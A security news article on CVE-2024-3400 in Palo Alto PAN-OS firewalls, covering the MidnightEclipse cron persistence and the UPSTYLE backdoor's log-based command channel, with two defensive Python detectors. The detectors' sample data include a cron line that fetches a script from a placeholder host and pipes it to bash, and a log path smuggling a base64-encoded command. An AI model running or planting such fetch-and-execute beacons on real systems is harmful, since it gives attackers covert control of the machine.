CVE-2024-3400 Vulnerability Hinges on Command Injection Flaw

Attackers have been exploiting a recently disclosed vulnerability in Palo Alto Networks' PAN-OS software since March 26, 2024, more than two weeks before it was publicly disclosed on April 12. Palo Alto Networks' Unit 42 tracks the activity as Operation MidnightEclipse and attributes it to a single, as yet unidentified, threat actor.

The flaw, CVE-2024-3400, carries a CVSS score of 10.0 and lets an unauthenticated attacker run arbitrary code as root on affected firewalls. It affects PAN-OS 10.2, PAN-OS 11.0 and PAN-OS 11.1 firewalls configured with a GlobalProtect gateway and device telemetry enabled. Palo Alto Networks has since revised its advisory to state that device telemetry is not required for exploitation, so any internet-exposed GlobalProtect gateway or portal on those versions should be treated as affected.

Operation MidnightEclipse exploits the flaw to install a cron job that runs every minute, fetches commands from an attacker-controlled server and executes them with bash. The attacker also maintains an access control list on the command-and-control server so that only the compromised device can reach it.
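A persistence mechanism of this shape (a scheduled job that pulls a remote file and feeds it straight into a shell) is easy to hunt for in crontab data. The following is an added example for this article, not code from Unit 42, Volexity or Palo Alto Networks; the crontab text is constructed, and the host and path in it are placeholders rather than real indicators.

```python
import re

# Constructed crontab text (not from the page or any vendor report): one
# routine entry and one entry of the kind described above, which fetches a
# remote file every minute and pipes it into bash. The host is a
# documentation address, not a real indicator.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/sh
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * /usr/bin/wget -qO- http://203.0.113.10/patch.sh | /bin/bash
"""

CRON_FIELDS = 5
# Tools commonly used to pull a payload from a remote server
FETCHER_RE = re.compile(r"\b(curl|wget)\b")
# Fetched content piped into a shell ("... | bash", "... | /bin/sh")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(/\S*/)?(ba)?sh\b")
# Fetched content substituted into a shell invocation ('bash -c "$(curl ...)"')
SUBST_TO_SHELL_RE = re.compile(r"(ba)?sh\s+-c\s+[\"']?\$\((curl|wget)\b")


def parse_crontab(text):
    """Return (schedule, command) tuples, skipping comments, blanks and VAR= lines.

    Handles both five-field schedules and @reboot/@hourly style shortcuts.
    """
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                entries.append((parts[0], parts[1]))
            continue
        parts = line.split(None, CRON_FIELDS)
        if len(parts) <= CRON_FIELDS:
            continue
        entries.append((" ".join(parts[:CRON_FIELDS]), parts[CRON_FIELDS]))
    return entries


def flag_remote_exec(text):
    """Flag cron entries that fetch from a URL and hand the result to a shell."""
    findings = []
    for schedule, command in parse_crontab(text):
        if not FETCHER_RE.search(command):
            continue
        if PIPE_TO_SHELL_RE.search(command) or SUBST_TO_SHELL_RE.search(command):
            findings.append({
                "schedule": schedule,
                "every_minute": schedule == "* * * * *",
                "command": command,
            })
    return findings


if __name__ == "__main__":
    for hit in flag_remote_exec(SAMPLE_CRONTAB):
        print(f"[{hit['schedule']}] {hit['command']}")
```

On a real system the same function can be run over the output of `crontab -l` for each user and over the files under /etc/cron.d; the every-minute schedule is recorded separately because a job that both fetches remote content and fires every minute is far more often a beacon than an administrative task.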

Python Backdoor Suspected as Part of Attack

Although the commands themselves have not been disclosed, the job is believed to deliver a Python-based backdoor that Volexity tracks as UPSTYLE, hosted at a URL on a separate server. Once executed, the backdoor writes and runs a second Python script that carries out the attacker's commands and writes the results into legitimate firewall files.

A notable feature of the backdoor is that it uses legitimate firewall files both to receive commands and to return their output. Commands are planted in the firewall's web-server error log by sending crafted requests for a page that does not exist; the resulting error entry records the requested path, which carries an encoded pattern that the backdoor locates, decodes and executes.

Command output is written into the firewall's bootstrap.min.css file, from which the attacker retrieves it; to cover its tracks, the backdoor then calls a function named "restore" that reverts bootstrap.min.css to its original contents after 15 seconds, erasing the evidence. Volexity observed the threat actor, which it tracks as UTA0218, using the compromised firewall to establish a reverse shell, download further tools, move into internal networks and exfiltrate data, though the full extent of the campaign remains unclear.
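Because the command channel leaves its payload in the error log, the log itself is the place to look for it. The detector below is an added example for this article, not Volexity's or Palo Alto Networks' code: the article does not reproduce the exact pattern the backdoor matches, so the example assumes a bracketed base64 token in the path of a request for a missing file, and the nginx-style error-log lines and client addresses are constructed. The same approach generalises to any channel that smuggles encoded data through 404 paths.

```python
import base64
import binascii
import re

# Constructed error-log lines (not from the page or any vendor report).
# Line 1 is an ordinary missing-file error; line 2 carries a bracketed
# base64 blob in the requested path, the marker this example assumes the
# backdoor looks for; line 3 has a bracket whose contents are not valid
# base64. Client addresses are documentation addresses.
SAMPLE_ERROR_LOG = """\
2024/04/10 09:12:01 [error] 2184#0: *7 open() "/var/www/global-protect/favicon.ico" failed (2: No such file or directory), client: 198.51.100.20, request: "GET /global-protect/favicon.ico HTTP/1.1"
2024/04/10 09:12:44 [error] 2184#0: *9 open() "/var/www/global-protect/css/img[aWQ7IHVuYW1lIC1h]" failed (2: No such file or directory), client: 203.0.113.5, request: "GET /global-protect/css/img[aWQ7IHVuYW1lIC1h] HTTP/1.1"
2024/04/10 09:13:02 [error] 2184#0: *11 open() "/var/www/global-protect/css/img[aaaaaaaaa]" failed (2: No such file or directory), client: 203.0.113.5, request: "GET /global-protect/css/img[aaaaaaaaa] HTTP/1.1"
"""

# Pull the client address and requested path out of an error-log entry
REQUEST_RE = re.compile(
    r'client: (?P<client>[\d.]+), request: "(?P<method>\w+) (?P<path>\S+) HTTP/'
)
# Assumed marker: a run of base64 characters inside square brackets
MARKER_RE = re.compile(r"\[([A-Za-z0-9+/=]{8,})\]")


def decode_marker(token):
    """Base64-decode a marker; return None if it is not valid base64 or not printable text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_smuggled_commands(log_text):
    """Return one finding per missing-file error whose path decodes to a command."""
    findings = []
    for line in log_text.splitlines():
        if "No such file or directory" not in line:
            continue  # only requests for pages that do not exist
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for token in MARKER_RE.findall(m.group("path")):
            command = decode_marker(token)
            if command is None:
                continue
            findings.append({
                "client": m.group("client"),
                "path": m.group("path"),
                "command": command,
            })
    return findings


if __name__ == "__main__":
    for hit in find_smuggled_commands(SAMPLE_ERROR_LOG):
        print(f"{hit['client']} -> {hit['command']!r} via {hit['path']}")
```

Two things make this check robust enough to run on a real log: it restricts itself to entries for files that do not exist, which is exactly where an attacker who wants to avoid touching the application would aim, and it insists that the bracketed token decodes to printable text before reporting it, so ordinary query strings and cache-busting tokens that happen to look base64-like are dropped rather than reported.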

April 15, 2024